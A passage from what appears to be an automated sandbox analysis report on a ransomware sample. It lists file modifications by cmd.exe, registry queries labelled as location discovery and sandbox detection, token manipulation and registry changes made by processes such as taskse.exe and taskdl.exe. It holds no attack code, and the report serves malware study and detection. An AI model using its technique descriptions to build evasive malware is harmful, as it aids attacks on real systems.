C:\Windows\WinSxS\MANIFE~1\AM149E~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AM3AA9~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\WOFC4A~2.MAN cmd.exe File opened for modification C:\Windows\WinSxS\WO99F0~1.264\msadox.dll cmd.exe File opened for modification C:\Windows\Microsoft.NET\Framework\v2.0.50727\System.EnterpriseServices.tlb cmd.exe File opened for modification C:\Windows\servicing\Packages\MI7355~1.CAT cmd.exe File opened for modification C:\Windows\WinSxS\AMCF3D~1.264\APPVSC~1.DLL cmd.exe File opened for modification C:\Windows\WinSxS\AM29B6~1.1_D\SPOOLS~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\FileMaps\$$B320~1.CDF cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AM2F7B~2.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\WO66A1~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\WO93D6~2.MAN cmd.exe File opened for modification C:\Windows\servicing\INBOXF~1\metadata\PRINTF~1.MUM cmd.exe File opened for modification C:\Windows\servicing\Packages\MIA4F6~1.CAT cmd.exe File opened for modification C:\Windows\WinSxS\Backup\AM2058~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AM01E3~2.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AMC4BA~1.MAN cmd.exe File opened for modification C:\Windows\PolicyDefinitions\en-US\CredSsp.adml cmd.exe File opened for modification C:\Windows\WinSxS\FileMaps\$$9396~1.CDF cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AM3D84~1.MAN cmd.exe File opened for modification C:\Windows\PolicyDefinitions\en-US\WCM.adml cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AMD076~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\AM4BCC~1.1_J\WLANSV~1.ADM cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AMF287~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AM6932~1.MAN cmd.exe File opened for modification C:\Windows\WinSxS\MANIFE~1\AM5BAC~2.MAN cmd.exe File opened for modification C:\Windows\WinSxS\AMEC42~1.1_J\EVENTV~1.MUI cmd.exe File opened for modification C:\Windows\WinSxS\Backup\AM0875~1.MUI cmd.exe File opened for modification C:\Windows\servicing\Packages\MI9159~1.CAT cmd.exe -
Access Token Manipulation: Create Process with Token 1 TTPs 1 IoCs
pid Process 2376 msedge.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 54 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language reg.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskhsvc.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language DllHost.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language WMIC.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language icacls.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskdl.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language taskse.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language ed01ebfbc9eb5bbea545af4d01bf5f1071661840480439c6e5babe8e080e41aa.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language @[email protected] Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language attrib.exe -
Checks processor information in registry 2 TTPs 2 IoCs
Processor information is often read in order to detect sandboxing environments.
description ioc Process Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 explorer.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString explorer.exe -
Enumerates system info in registry 2 TTPs 11 IoCs
description ioc Process Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemSKU SearchApp.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer msedge.exe Key value queried \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS SearchApp.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe Key opened \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS msedge.exe -
description ioc Process Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\Toolbar explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\Locked = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\Toolbar\ShellBrowser\ITBar7Layout = 13000000000000000000000020000000100000000000000001000000010700005e01000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\Software\Microsoft\Internet Explorer\GPU SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000\SOFTWARE\Microsoft\Internet Explorer\GPU SearchApp.exe -
Modifies data under HKEY_USERS 15 IoCs
description ioc Process Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglowBalance = "10" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColor = "3288365271" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\AccentColor = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationAfterglow = "3288365271" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationBlurBalance = "1" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\EnableWindowColorization = "59" LogonUI.exe Key created \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\StartColorMenu = "4288567808" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationGlassAttribute = "1" LogonUI.exe Set value (data) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentPalette = a6d8ff0076b9ed00429ce3000078d700005a9e000042750000264200f7630c00 LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Explorer\Accent\AccentColorMenu = "4292311040" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\DWM\ColorizationColorBalance = "89" LogonUI.exe Set value (int) \REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\Themes\History\AutoColor = "0" LogonUI.exe -
Modifies registry class 64 IoCs
description ioc Process Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Vid = "{65F125E5-7BE1-4810-BA9D-D271C8432CE3}" explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "23" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "23" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "56" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "185" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\MRUListEx = 0100000000000000ffffffff explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CacheLimit = "51200" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search\ = "56" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\MuiCache SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\ColInfo = 00000000000000000000000000000000fddfdffd100000000000000000000000010000001800000030f125b7ef471a10a5f102608c9eebac0a000000b4000000 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\NumberOfSubdomains = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\microsoft.windows.search\ = "0" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 020202 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search\ = "0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CachePrefix = "Visited:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings mspaint.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Content\CachePrefix SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\microsoft.windows.search SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Mode = "6" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3 explorer.exe Set value (str) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Cookies\CachePrefix = "Cookie:" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DomStorageState\EdpCleanupState = "0" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\LogicalViewMode = "2" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\NodeSlot = "3" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "0" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\MRUListEx = 00000000ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel\ShowCmd = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\Total SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\History\CacheVersion = "1" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\AllFolders\Shell\Microsoft.Windows.ControlPanel explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByKey:PID = "0" explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupByDirection = "1" explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Settings\Cache\Extensible Cache SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\Total\ = "23" SearchApp.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\ = "0" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "56" SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search\Total = "0" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\Sort = 000000000000000000000000000000000100000030f125b7ef471a10a5f102608c9eebac0a00000001000000 explorer.exe Key created \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\DOMStorage\windows.search SearchApp.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\CurrentVersion\AppContainer\Storage\microsoft.windows.search_cw5n1h2txyewy\Internet Explorer\EdpDomStorage\windows.search\NumberOfSubdomains = "0" SearchApp.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\2\0\0\MRUListEx = ffffffff explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\GroupView = "0" explorer.exe Set value (data) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\BagMRU\NodeSlots = 0202 explorer.exe Set value (int) \REGISTRY\USER\S-1-5-21-3350944739-639801879-157714471-1000_Classes\Local Settings\Software\Microsoft\Windows\Shell\Bags\3\Shell\{5C4F28B5-F869-4E84-8E60-F11DB97C5CC7}\FFlags = "18874385" explorer.exe -
Modifies registry key 1 TTPs 1 IoCs
pid Process 4032 reg.exe -
NTFS ADS 1 IoCs
description ioc Process File opened for modification C:\Users\Admin\Downloads\Unconfirmed 787059.crdownload:SmartScreen msedge.exe -
Suspicious behavior: AddClipboardFormatListener 1 IoCs
pid Process 2656 explorer.exe -
Suspicious behavior: EnumeratesProcesses 32 IoCs
